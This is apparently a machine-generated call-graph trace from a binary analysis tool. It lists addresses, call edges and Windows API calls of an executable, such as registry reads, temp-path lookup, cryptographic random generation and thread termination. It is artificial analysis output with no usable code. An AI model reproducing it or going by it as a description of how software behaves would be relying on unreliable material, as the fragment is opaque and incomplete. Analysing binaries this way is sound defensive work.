50742->50745 50743 e395e1 50871 e9c3be 26 API calls 2 library calls 50743->50871 50744->50741 50744->50743 50747 e51c70 78 API calls 50745->50747 50753 e39105 50747->50753 50754 e48780 _MREFOpen@16 28 API calls 50753->50754 50755 e39182 __cftof 50754->50755 50756 e8d73a std::_Facet_Register 28 API calls 50755->50756 50800 e51c70 78 API calls 50799->50800 50801 e7e8b4 50800->50801 50802 e8d73a std::_Facet_Register 28 API calls 50801->50802 50803 e7e90e 50802->50803 50804 e51c70 78 API calls 50803->50804 50807 e7e942 __cftof 50803->50807 50805 e7e928 50804->50805 50873 e47fd0 50805->50873 50807->50721 50809 e78632 50808->50809 50810 e7862e 50808->50810 50811 e7af50 _MREFOpen@16 24 API calls 50809->50811 50812 e51c70 78 API calls 50810->50812 50811->50810 50813 e78651 50812->50813 50917 e77ee0 BCryptOpenAlgorithmProvider 50813->50917 50815 e78660 50933 e784e0 50815->50933 50817 e7866c BCryptGenRandom 50818 e7867b 50817->50818 50820 e786d4 50817->50820 50819 e7868d BCryptCloseAlgorithmProvider 50818->50819 50824 e78695 50818->50824 50819->50824 50821 e786da SetLastError 50820->50821 50822 e462b0 _MREFOpen@16 28 API calls 50821->50822 50823 e786f1 50822->50823 50974 e78020 80 API calls 3 library calls 50823->50974 50827 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50824->50827 50826 e78701 50828 e8f18a Concurrency::cancel_current_task RaiseException 50826->50828 50829 e786ce 50827->50829 50830 e7870f 50828->50830 50829->50723 50832 e7c139 50831->50832 50833 e51c70 78 API calls 50832->50833 50834 e7c168 50833->50834 51014 e7d310 50834->51014 50838 e7c259 50838->50729 50840 e9d9e8 _Yarn 21 API calls 50839->50840 50847 e7af5f 50840->50847 50841 e38f62 50841->50734 50842 e7af91 Concurrency::cancel_current_task 50844 e8f18a Concurrency::cancel_current_task RaiseException 50842->50844 50843 e8ce57 9 API calls _MREFOpen@16 50843->50847 50845 e7afa9 50844->50845 50846 e9d9e8 _Yarn 21 API calls 50846->50847 50847->50841 50847->50842 50847->50843 50847->50846 50874 e48031 50873->50874 50875 e47fff 50873->50875 50894 e462b0 50874->50894 50876 e48003 50875->50876 50885 e7aee0 50875->50885 50876->50807 50883 e8f18a Concurrency::cancel_current_task RaiseException 50884 e4805f 50883->50884 50901 e9da12 50885->50901 50887 e4801d 50887->50807 50888 e8ce57 9 API calls _MREFOpen@16 50890 e7aef1 50888->50890 50889 e7af25 Concurrency::cancel_current_task 50891 e8f18a Concurrency::cancel_current_task RaiseException 50889->50891 50890->50887 50890->50888 50890->50889 50893 e9da12 27 API calls 50890->50893 50892 e7af3d 50891->50892 50893->50890 50895 e462d3 50894->50895 50896 e48780 _MREFOpen@16 28 API calls 50895->50896 50897 e462e5 50896->50897 50898 e34a50 50897->50898 50899 e462f0 _MREFOpen@16 78 API calls 50898->50899 50900 e34aa0 50899->50900 50900->50883 50902 e9da1d 50901->50902 50905 e9da34 50902->50905 50906 e9da43 50905->50906 50907 e9daa7 50905->50907 50906->50907 50910 e9da58 50906->50910 50908 e9ca3d _free 20 API calls 50907->50908 50909 e9daac 50908->50909 50911 e9c3ae __cftof 26 API calls 50909->50911 50913 e9da82 50910->50913 50914 e9da75 50910->50914 50912 e9da2f 50911->50912 50912->50890 50916 e9d9e8 _Yarn 21 API calls 50913->50916 50915 e9ca3d _free 20 API calls 50914->50915 50915->50912 50916->50912 50918 e77f27 50917->50918 50919 e77f43 50917->50919 50920 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50918->50920 50922 e77f49 SetLastError 50919->50922 50921 e77f3f 50920->50921 50921->50815 50923 e462b0 _MREFOpen@16 28 API calls 50922->50923 50924 e77f60 50923->50924 50975 e78020 80 API calls 3 library calls 50924->50975 50926 e77f73 50927 e8f18a Concurrency::cancel_current_task RaiseException 50926->50927 50928 e77f81 50927->50928 50976 e8ee1e 27 API calls 2 library calls 50928->50976 50930 e77fd7 50931 e462f0 _MREFOpen@16 78 API calls 50930->50931 50932 e77ff9 50931->50932 50932->50815 50934 e78522 50933->50934 50935 e7859e 50933->50935 50953 e78572 __Mtx_unlock 50934->50953 50977 e8caa7 50934->50977 50980 e8d658 6 API calls 50935->50980 50938 e785a8 50938->50934 50981 e8ca86 50938->50981 50940 e785e0 50944 e8bfee 79 API calls 50940->50944 50941 e78548 50945 e8d73a std::_Facet_Register 28 API calls 50941->50945 50941->50953 50947 e785e6 50944->50947 50948 e7855d 50945->50948 50946 e8d9a6 29 API calls 50949 e785ce 50946->50949 50952 e7af50 _MREFOpen@16 24 API calls 50947->50952 50955 e7862e 50947->50955 50951 e77ee0 82 API calls 50948->50951 50948->50953 50984 e8d60e EnterCriticalSection LeaveCriticalSection WakeAllConditionVariable SetEvent ResetEvent 50949->50984 50951->50953 50952->50955 50953->50817 50954 e51c70 78 API calls 50956 e78651 50954->50956 50955->50954 50957 e77ee0 82 API calls 50956->50957 50958 e78660 50957->50958 50959 e784e0 106 API calls 50958->50959 50960 e7866c BCryptGenRandom 50959->50960 50961 e786d4 50960->50961 50962 e7867b 50960->50962 50964 e786da SetLastError 50961->50964 50963 e7868d BCryptCloseAlgorithmProvider 50962->50963 50967 e78695 50962->50967 50963->50967 50965 e462b0 _MREFOpen@16 28 API calls 50964->50965 50966 e786f1 50965->50966 50985 e78020 80 API calls 3 library calls 50966->50985 50970 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50967->50970 50969 e78701 50971 e8f18a Concurrency::cancel_current_task RaiseException 50969->50971 50972 e786ce 50970->50972 50973 e7870f 50971->50973 50972->50817 50974->50826 50975->50926 50976->50930 50986 e8c869 50977->50986 50980->50938 51008 e8c811 50981->51008 50983 e785c4 50983->50946 50984->50934 50985->50969 50987 e8c8bf 50986->50987 50988 e8c891 GetCurrentThreadId 50986->50988 50991 e8c923 50987->50991 50992 e8c8c3 GetCurrentThreadId 50987->50992 50989 e8c89c GetCurrentThreadId 50988->50989 50990 e8c8b7 50988->50990 50989->50990 50996 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50990->50996 50993 e8c9bc GetCurrentThreadId 50991->50993 50995 e8c943 50991->50995 51000 e8c8ce 50992->51000 50993->51000 50994 e8c9f3 GetCurrentThreadId 50994->50990 51004 e8be9b 50995->51004 50998 e7853d 50996->50998 50998->50940 50998->50941 51000->50990 51000->50994 51001 e8c973 GetCurrentThreadId 51001->51000 51002 e8c94e __Xtime_diff_to_millis2 51001->51002 51002->50990 51002->51000 51002->51001 51003 e8be9b _xtime_get 2 API calls 51002->51003 51003->51002 51005 e8beaa 51004->51005 51007 e8beb7 __aulldvrm 51004->51007 51006 e8be74 __Xtime_get_ticks GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime 51005->51006 51005->51007 51006->51007 51007->51002 51009 e8c81e 51008->51009 51010 e8c7dc InitializeCriticalSectionEx 51009->51010 51011 e8c7fa InitializeConditionVariable 51009->51011 51010->50983 51011->50983 51015 e51c70 78 API calls 51014->51015 51016 e7d34b 51015->51016 51017 e8d73a std::_Facet_Register 28 API calls 51016->51017 51018 e7d397 51017->51018 51019 e7af50 _MREFOpen@16 24 API calls 51018->51019 51020 e7c193 51018->51020 51019->51020 51021 e85580 51020->51021 51022 e85589 51021->51022 51023 e8558e 51021->51023 51031 e82bc0 5 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 51022->51031 51024 e855ad 51023->51024 51025 e855a4 51023->51025 51033 e855c0 5 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 51024->51033 51032 e89c00 5 API calls 2 library calls 51025->51032 51029 e855a9 51029->50838 51030 e855b2 51030->50838 51031->51023 51032->51029 51033->51030 51363 e3a1eb GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 51362->51363 51363->49708 51399 e9f66b 51364->51399 51366 e8c7a2 51367 e8c7a7 51366->51367 51413 e8c15f 28 API calls Concurrency::cancel_current_task 51366->51413 51367->49711 51371 e4ac03 51370->51371 51372 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51371->51372 51373 e4ac89 51372->51373 51373->49717 51428 e49ee0 51374->51428 51380 e4cff7 51379->51380 51381 e4d039 51380->51381 51382 e49d90 78 API calls 51380->51382 51384 e480a0 75 API calls 51381->51384 51387 e4d070 51381->51387 51382->51381 51383 e322e0 78 API calls 51385 e4d1d7 51383->51385 51384->51387 51386 e3a55b 51385->51386 51462 e49e50 78 API calls 51385->51462 51386->49743 51387->51383 51400 e9f68c 51399->51400 51401 e9f677 51399->51401 51414 ea503d 51400->51414 51423 e9ca3d 20 API calls _free 51401->51423 51405 e9f67c 51424 e9c3ae 26 API calls __cftof 51405->51424 51406 e9f6af 51406->51366 51409 e9f687 51409->51366 51410 e9f6a0 51426 e9ca3d 20 API calls _free 51410->51426 51412 e9f6ab 51412->51366 51415 ea493d __FrameHandler3::FrameUnwindToState 5 API calls 51414->51415 51416 ea5064 51415->51416 51417 ea508e 51416->51417 51420 ea506d 51416->51420 51427 e9f226 45 API calls __FrameHandler3::FrameUnwindToState 51417->51427 51419 ea5093 51421 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51420->51421 51422 e9f697 51421->51422 51422->51406 51425 e9ca3d 20 API calls _free 51422->51425 51423->51405 51424->51409 51425->51410 51426->51412 51427->51419 51429 e322e0 78 API calls 51428->51429 51430 e49f59 51429->51430 51431 e8d73a std::_Facet_Register 28 API calls 51430->51431 51432 e49f60 51431->51432 51446 e8c36f 51432->51446 51434 e49f7a 51435 e4a080 79 API calls 51434->51435 51437 e49fab 51435->51437 51436 e49ff3 51439 e43105 51436->51439 51458 e8c589 9 API calls 2 library calls 51436->51458 51437->51436 51438 e322e0 78 API calls 51437->51438 51438->51436 51441 e49cc0 51439->51441 51442 e8d73a std::_Facet_Register 28 API calls 51441->51442 51443 e49cfa 51442->51443 51444 e8c36f std::locale::_Init 51 API calls 51443->51444 51445 e3a2cd 51444->51445 51445->49723 51447 e8c37b __EH_prolog3 51446->51447 51448 e8bf0d std::_Lockit::_Lockit 7 API calls 51447->51448 51449 e8c386 51448->51449 51450 e8c3b7 51449->51450 51459 e8c4d4 28 API calls 2 library calls 51449->51459 51453 e8bf65 std::_Lockit::~_Lockit 2 API calls 51450->51453 51452 e8c399 51460 e8c4f7 47 API calls std::locale::_Setgloballocale 51452->51460 51455 e8c3f7 std::locale::_Init 51453->51455 51455->51434 51456 e8c3a1 51461 e8c2c7 21 API calls _Yarn 51456->51461 51458->51439 51459->51452 51460->51456 51461->51450 51462->51386 51704 e3af10 51469->51704 51472 e462f0 _MREFOpen@16 78 API calls 51473 e3f08c 51472->51473 51474 e48780 _MREFOpen@16 28 API calls 51473->51474 51475 e3f0ca __cftof 51474->51475 51476 e559a0 80 API calls 51475->51476 51477 e3f10f 51476->51477 51478 e559a0 80 API calls 51477->51478 51479 e3f11b __cftof 51478->51479 51480 e8d73a std::_Facet_Register 28 API calls 51479->51480 51481 e3f136 __cftof 51480->51481 51482 e372c0 80 API calls 51481->51482 51483 e3f160 51482->51483 51484 e363d0 80 API calls 51483->51484 51485 e3f182 51484->51485 51486 e556e0 80 API calls 51485->51486 51487 e3f1f1 51486->51487 51488 e556e0 80 API calls 51487->51488 51489 e3f201 51488->51489 51490 e39ad0 20 API calls 51489->51490 51495 e3f22d error_info_injector 51490->51495 51491 e3f2fd 51712 e9c3be 26 API calls 2 library calls 51491->51712 51492 e3f2d6 error_info_injector 51493 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51492->51493 51496 e3f2f9 51493->51496 51495->51491 51495->51492 51498 e3f310 51496->51498 51499 e3af10 30 API calls 51498->51499 51500 e3f367 51499->51500 51501 e3af10 30 API calls 51500->51501 51502 e3f37f 51501->51502 51503 e462f0 _MREFOpen@16 78 API calls 51502->51503 51504 e3f395 51503->51504 51505 e48780 _MREFOpen@16 28 API calls 51504->51505 51506 e3f3f1 GetTempPathA 51505->51506 51507 e48780 _MREFOpen@16 28 API calls 51506->51507 51508 e3f436 51507->51508 51713 e4a520 51508->51713 51705 e3af1d __cftof __wsopen_s 51704->51705 51706 e3af52 RegOpenKeyExW RegGetValueA 51705->51706 51707 e3af9b 51706->51707 51711 e3afca 51706->51711 51710 e48780 _MREFOpen@16 28 API calls 51707->51710 51708 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51709 e3afd8 51708->51709 51709->51472 51710->51711 51711->51708 51714 e4a543 51713->51714 51714->51714 51715 e4a635 51714->51715 51716 e4a561 51714->51716 51751 e31870 28 API calls _MREFOpen@16 51715->51751 51721 e4a5d9 _Yarn 51716->51721 51949 e9d2c9 51935->51949 51937 e9d3b2 51937->50036 51946 e9d3dd 45 API calls 7 library calls 51937->51946 51939 ea493d __FrameHandler3::FrameUnwindToState 5 API calls 51938->51939 51940 ea4e06 51939->51940 51941 ea4e24 InitializeCriticalSectionAndSpinCount 51940->51941 51942 ea4e0f 51940->51942 51941->51942 51943 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51942->51943 51944 ea4e3b 51943->51944 51944->50044 51946->50036 51947->50042 51948->50047 51950 e9d2d5 __FrameHandler3::FrameUnwindToState 51949->51950 51955 e9f2ab EnterCriticalSection 51950->51955 51952 e9d2e3 51956 e9d317 51952->51956 51954 e9d30a __wsopen_s 51954->51937 51955->51952 51959 e9f2f3 LeaveCriticalSection 51956->51959 51958 e9d321 51958->51954 51959->51958 51961 ea0a2f 51960->51961 51962 ea0a1d 51960->51962 51973 ea08dd 51961->51973 51981 ea0ab7 GetModuleHandleW 51962->51981 51968 ea0a22 51968->51961 51982 ea0afb 8 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 51968->51982 51972 ea0a2e 51972->51961 51974 ea08e9 __FrameHandler3::FrameUnwindToState 51973->51974 51984 e9f2ab EnterCriticalSection 51974->51984 51976 ea08f3 51985 ea0920 51976->51985 51981->51968 51982->51972 51984->51976 51986 ea092c _unexpected 51985->51986 51989 ea0999 51986->51989 51994 ea09c7 51986->51994 52001 ea14e0 20 API calls __FrameHandler3::FrameUnwindToState 51986->52001 51990 ea09b6 51989->51990 51991 ea1769 __FrameHandler3::FrameUnwindToState 30 API calls 51989->51991 51992 ea1769 __FrameHandler3::FrameUnwindToState 30 API calls 51990->51992 51991->51990 51992->51994 51998 eb29d0 51994->51998 51999 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51998->51999 52000 eb29da 51999->52000 52000->52000 52001->51989 52003 e31060 52008 e34670 52003->52008 52006 e8d9a6 29 API calls 52007 e31070 52006->52007 52009 e8d73a std::_Facet_Register 28 API calls 52008->52009 52010 e346ae 52009->52010 52037 e334f0 InitializeCriticalSectionAndSpinCount 52010->52037 52012 e346ce 52013 e34896 52012->52013 52014 e8d73a std::_Facet_Register 28 API calls 52012->52014 52015 e33480 78 API calls 52013->52015 52016 e34713 __cftof 52014->52016 52017 e348a3 52015->52017 52040 e33b20 52016->52040 52070 e336e0 27 API calls 2 library calls 52017->52070 52019 e348ab 52071 e4a230 28 API calls Concurrency::cancel_current_task 52019->52071 52023 e34733 52023->52017 52024 e34769 EnterCriticalSection 52023->52024 52025 e347c1 LeaveCriticalSection 52024->52025 52026 e34781 __InternalCxxFrameHandler 52024->52026 52033 e34805 52025->52033 52026->52025 52027 e34883 52026->52027 52068 e33680 27 API calls 2 library calls 52027->52068 52028 e8d73a 28 API calls std::_Facet_Register 52028->52033 52030 e3488b 52069 e4a250 28 API calls Concurrency::cancel_current_task 52030->52069 52031 e337c0 202 API calls 52031->52033 52033->52028 52033->52031 52034 e34861 52033->52034 52035 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52034->52035 52036 e31066 52035->52036 52036->52006 52038 e3353a GetLastError 52037->52038 52039 e33559 52037->52039 52038->52012 52039->52012 52041 e33b84 52040->52041 52042 e334f0 2 API calls 52041->52042 52043 e33bc0 52042->52043 52044 e33cf3 52043->52044 52045 e33be7 CreateEventW 52043->52045 52048 e33480 78 API calls 52044->52048 52046 e33c45 CreateEventW 52045->52046 52047 e33c18 GetLastError 52045->52047 52050 e33c5a GetLastError CloseHandle 52046->52050 52051 e33c8e 52046->52051 52047->52046 52049 e33d00 52047->52049 52048->52049 52054 e33480 78 API calls 52049->52054 52050->52051 52052 e33d0d 52050->52052 52053 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52051->52053 52056 e33480 78 API calls 52052->52056 52055 e33ced 52053->52055 52054->52052 52055->52023 52057 e33d1a 52056->52057 52058 e33db0 error_info_injector 52057->52058 52059 e33d48 WaitForMultipleObjects CloseHandle 52057->52059 52063 e33dbb CloseHandle CloseHandle DeleteCriticalSection 52058->52063 52060 e33d86 QueueUserAPC WaitForSingleObject 52059->52060 52061 e33d7e TerminateThread 52059->52061 52062 e33d9c 52060->52062 52061->52062 52062->52058 52064 e33da3 CloseHandle 52062->52064 52065 e33ddb error_info_injector 52063->52065 52064->52058 52066 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52065->52066 52067 e33df5 52066->52067 52067->52023 52068->52030 52070->52019 52072 ea705e 52073 ea706a __FrameHandler3::FrameUnwindToState 52072->52073 52074 ea7070 52073->52074 52075 ea7087 52073->52075 52106 e9ca3d 20 API calls _free 52074->52106 52085 e98911 EnterCriticalSection 52075->52085 52078 ea7075 52107 e9c3ae 26 API calls __cftof 52078->52107 52079 ea7097 52086 ea70d4 52079->52086 52082 ea70a3 52108 ea70ca LeaveCriticalSection __fread_nolock 52082->52108 52084 ea7080 __wsopen_s 52085->52079 52087 ea70fc 52086->52087 52088 ea70e2 52086->52088 52090 ea3c8d __fread_nolock 26 API calls 52087->52090 52112 e9ca3d 20 API calls _free 52088->52112 52092 ea7106 52090->52092 52091 ea70e7 52113 e9c3ae 26 API calls __cftof 52091->52113 52109 ea843a 52092->52109 52094 ea70f2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 52094->52082 52097 ea7192 52099 ea71c0 52097->52099 52102 ea71ac 52097->52102 52098 ea71e7 52098->52099 52100 ea71f4 52098->52100 52099->52094 52116 ea7259 30 API calls 2 library calls 52099->52116 52115 e9ca3d 20 API calls _free 52100->52115 52114 ea741b 31 API calls 4 library calls 52102->52114 52104 ea71b8 52104->52094 52106->52078 52107->52084 52108->52084 52117 ea82ba 52109->52117 52111 ea7121 52111->52094 52111->52097 52111->52098 52112->52091 52113->52094 52114->52104 52115->52094 52116->52094 52118 ea82c6 __FrameHandler3::FrameUnwindToState 52117->52118 52119 ea82ce 52118->52119 52121 ea82e6 52118->52121 52152 e9ca2a 20 API calls _free 52119->52152 52122 ea8397 52121->52122 52125 ea831b 52121->52125 52157 e9ca2a 20 API calls _free 52122->52157 52123 ea82d3 52153 e9ca3d 20 API calls _free 52123->52153 52142 eabdd1 EnterCriticalSection 52125->52142 52126 ea839c 52158 e9ca3d 20 API calls _free 52126->52158 52130 ea8321 52132 ea835a 52130->52132 52133 ea8345 52130->52133 52131 ea83a4 52159 e9c3ae 26 API calls __cftof 52131->52159 52143 ea83bc 52132->52143 52154 e9ca3d 20 API calls _free 52133->52154 52136 ea82db __wsopen_s 52136->52111 52138 ea834a 52155 e9ca2a 20 API calls _free 52138->52155 52139 ea8355 52156 ea838f LeaveCriticalSection __wsopen_s 52139->52156 52142->52130 52160 eac045 52143->52160 52145 ea83ce 52146 ea83d6 52145->52146 52147 ea83e7 SetFilePointerEx 52145->52147 52173 e9ca3d 20 API calls _free 52146->52173 52149 ea83ff GetLastError 52147->52149 52151 ea83db 52147->52151 52174 e9ca07 20 API calls 2 library calls 52149->52174 52151->52139 52152->52123 52153->52136 52154->52138 52155->52139 52156->52136 52157->52126 52158->52131 52159->52136 52161 eac052 52160->52161 52162 eac067 52160->52162 52175 e9ca2a 20 API calls _free 52161->52175 52167 eac08c 52162->52167 52177 e9ca2a 20 API calls _free 52162->52177 52164 eac057 52176 e9ca3d 20 API calls _free 52164->52176 52167->52145 52168 eac097 52178 e9ca3d 20 API calls _free 52168->52178 52170 eac05f 52170->52145 52171 eac09f 52179 e9c3ae 26 API calls __cftof 52171->52179 52173->52151 52174->52151 52175->52164 52176->52170 52177->52168 52178->52171 52179->52170 52180 e422a0 52181 e422a9 52180->52181 52183 e422bd 52180->52183 52181->52183 52184 e98c09 52181->52184 52185 e98c1b 52184->52185 52188 e98c24 ___scrt_uninitialize_crt 52184->52188 52198 e98ab2 75 API calls ___scrt_uninitialize_crt 52185->52198 52187 e98c21 52187->52183 52188->52187 52190 e98a5c 52188->52190 52191 e98a68 __FrameHandler3::FrameUnwindToState 52190->52191 52199 e98911 EnterCriticalSection 52191->52199 52193 e98a76 52200 e98bb9 52193->52200 52197 e98a99 __wsopen_s 52197->52187 52198->52187 52199->52193 52201 e98bcf 52200->52201 52202 e98bc6 52200->52202 52203 e98b56 ___scrt_uninitialize_crt 71 API calls 52201->52203 52211 e98ab2 75 API calls ___scrt_uninitialize_crt 52202->52211 52205 e98bd5 52203->52205 52206 ea3c8d __fread_nolock 26 API calls 52205->52206 52209 e98a87 52205->52209 52207 e98bef 52206->52207 52212 ea52be 30 API calls 3 library calls 52207->52212 52210 e98aa6 LeaveCriticalSection __fread_nolock 52209->52210 52210->52197 52211->52209 52212->52209 52213 e43bc0 52214 e43bd6 52213->52214 52217 e544d0 52214->52217 52219 e544e1 52217->52219 52218 e43bdf 52219->52218 52221 e527c0 52219->52221 52222 e52817 52221->52222 52223 e527f7 52221->52223 52257 e52180 52222->52257 52224 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52223->52224 52226 e52811 52224->52226 52226->52219 52228 e8f18a Concurrency::cancel_current_task RaiseException 52229 e5283c 52228->52229 52230 e52873 52229->52230 52231 e5289c 52229->52231 52232 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52230->52232 52233 e52180 78 API calls 52231->52233 52234 e52896 52232->52234 52235 e528b3 52233->52235 52234->52219 52236 e8f18a Concurrency::cancel_current_task RaiseException 52235->52236 52237 e528c1 52236->52237 52238 e52903 52237->52238 52239 e52929 52237->52239 52240 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52238->52240 52241 e52180 78 API calls 52239->52241 52242 e52923 52240->52242 52243 e52940 52241->52243 52242->52219 52244 e8f18a Concurrency::cancel_current_task RaiseException 52243->52244 52245 e5294e 52244->52245 52246 e52987 52245->52246 52247 e529b0 52245->52247 52275 e35f70 52246->52275 52278 e43e00 52246->52278 52249 e52180 78 API calls 52247->52249 52248 e52994 52250 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52248->52250 52251 e529c7 52249->52251 52252 e529aa 52250->52252 52253 e8f18a Concurrency::cancel_current_task RaiseException 52251->52253 52252->52219 52254 e529d5 52253->52254 52254->52219 52258 e521c7 52257->52258 52259 e5226c 52257->52259 52303 e4cc60 28 API calls 4 library calls 52258->52303 52304 e31870 28 API calls _MREFOpen@16 52259->52304 52261 e52271 52305 e9c3be 26 API calls 2 library calls 52261->52305 52264 e521e6 52266 e462f0 _MREFOpen@16 78 API calls 52264->52266 52268 e52212 52266->52268 52268->52261 52270 e5223e error_info_injector 52268->52270 52271 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52270->52271 52273 e52266 52271->52273 52273->52228 52306 e72e60 52275->52306 52277 e35f86 52277->52248 52279 e43e1e 52278->52279 52287 e43ef4 52278->52287 52280 e43e3c 52279->52280 52281 e484a0 28 API calls 52279->52281 52282 e43eff 52280->52282 52284 e43e72 52280->52284 52281->52280 52331 e4a020 28 API calls 2 library calls 52282->52331 52292 e43e78 _Yarn 52284->52292 52330 e4d290 28 API calls 5 library calls 52284->52330 52285 e43f04 52288 e43f54 52285->52288 52289 e462b0 _MREFOpen@16 28 API calls 52285->52289 52287->52248 52288->52248 52290 e43f73 52289->52290 52291 e34a50 78 API calls 52290->52291 52293 e43f86 52291->52293 52292->52248 52294 e8f18a Concurrency::cancel_current_task RaiseException 52293->52294 52295 e43f94 52294->52295 52296 e43fdc 52295->52296 52297 e462b0 _MREFOpen@16 28 API calls 52295->52297 52296->52248 52298 e4403b 52297->52298 52332 e34bb0 78 API calls _MREFOpen@16 52298->52332 52300 e4404e 52301 e8f18a Concurrency::cancel_current_task RaiseException 52300->52301 52302 e4405c 52301->52302 52302->52248 52303->52264 52307 e73270 52306->52307 52318 e72e9d _MREFOpen@16 52306->52318 52308 e462b0 _MREFOpen@16 28 API calls 52307->52308 52309 e7327d 52308->52309 52329 e70ff0 78 API calls 3 library calls 52309->52329 52311 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52314 e7326a 52311->52314 52312 e72f02 _MREFOpen@16 52316 e7af50 _MREFOpen@16 24 API calls 52312->52316 52322 e7313a _Yarn 52312->52322 52323 e73208 52312->52323 52313 e73290 52315 e8f18a Concurrency::cancel_current_task RaiseException 52313->52315 52314->52277 52317 e7329e 52315->52317 52316->52322 52317->52277 52318->52312 52320 e732d0 _MREFOpen@16 24 API calls 52318->52320 52320->52312 52321 e732d0 _MREFOpen@16 24 API calls 52321->52323 52325 e71d60 52322->52325 52323->52311 52326 e71d71 52325->52326 52327 e71d98 52325->52327 52326->52327 52328 e44580 24 API calls 52326->52328 52327->52321 52328->52327 52329->52313 52330->52287 52331->52285 52332->52300 52333 e509c0 52334 e50a36 52333->52334 52335 e50a40 52334->52335 52336 e50b9e 52334->52336 52527 e514a0 20 API calls 52335->52527 52471 e502e0 52336->52471 52338 e50a45 52340 e50a5f 52338->52340 52342 e7af50 _MREFOpen@16 24 API calls 52338->52342 52345 e55860 80 API calls 52340->52345 52342->52340 52343 e502e0 78 API calls 52344 e50bca 52343->52344 52347 e4a650 28 API calls 52344->52347 52346 e50a9e 52345->52346 52351 e7af40 20 API calls 52346->52351 52359 e50ad2 52346->52359 52348 e50bf3 52347->52348 52486 e4a6a0 52348->52486 52351->52359 52352 e4a650 28 API calls 52353 e50c15 52352->52353 52354 e4a6a0 28 API calls 52353->52354 52356 e50c24 52354->52356 52355 e50afa 52536 e5a810 80 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 52355->52536 52358 e4a650 28 API calls 52356->52358 52361 e50c37 52358->52361 52359->52355 52528 e56090 52359->52528 52360 e50b08 52537 e514a0 20 API calls 52360->52537 52362 e34a50 78 API calls 52361->52362 52364 e50c4a 52362->52364 52365 e8f18a Concurrency::cancel_current_task RaiseException 52364->52365 52368 e50c5b 52365->52368 52367 e50b22 52370 e7af40 20 API calls 52367->52370 52375 e50b51 52367->52375 52369 e50ce9 52368->52369 52376 e50cd6 52368->52376 52489 e47ee0 52369->52489 52370->52375 52372 e50cee 52374 e50d11 52372->52374 52377 e7af50 _MREFOpen@16 24 API calls 52372->52377 52373 e50e83 52381 e502e0 78 API calls 52373->52381 52379 e47ee0 80 API calls 52374->52379 52378 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52375->52378 52376->52373 52383 e4a650 28 API calls 52376->52383 52377->52374 52380 e50b94 52378->52380 52382 e50d3c 52379->52382 52384 e50e99 52381->52384 52495 e55860 52382->52495 52385 e50e5f 52383->52385 52386 e502e0 78 API calls 52384->52386 52387 e34a50 78 API calls 52385->52387 52388 e50eb3 52386->52388 52389 e50e72 52387->52389 52391 e4a650 28 API calls 52388->52391 52390 e8f18a Concurrency::cancel_current_task RaiseException 52389->52390 52390->52373 52393 e50edc 52391->52393 52395 e4a6a0 28 API calls 52393->52395 52396 e50eeb 52395->52396 52398 e4a650 28 API calls 52396->52398 52397 e50d7f 52538 e5a810 80 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 52397->52538 52399 e50efe 52398->52399 52400 e4a6a0 28 API calls 52399->52400 52403 e50f0d 52400->52403 52402 e50d9c 52404 e50dbf 52402->52404 52406 e7af40 20 API calls 52402->52406 52405 e4a650 28 API calls 52403->52405 52410 e7af40 20 API calls 52404->52410 52412 e50dec 52404->52412 52407 e50f23 52405->52407 52406->52404 52408 e34a50 78 API calls 52407->52408 52409 e50f33 52408->52409 52411 e8f18a Concurrency::cancel_current_task RaiseException 52409->52411 52410->52412 52415 e50f41 52411->52415 52413 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 52412->52413 52414 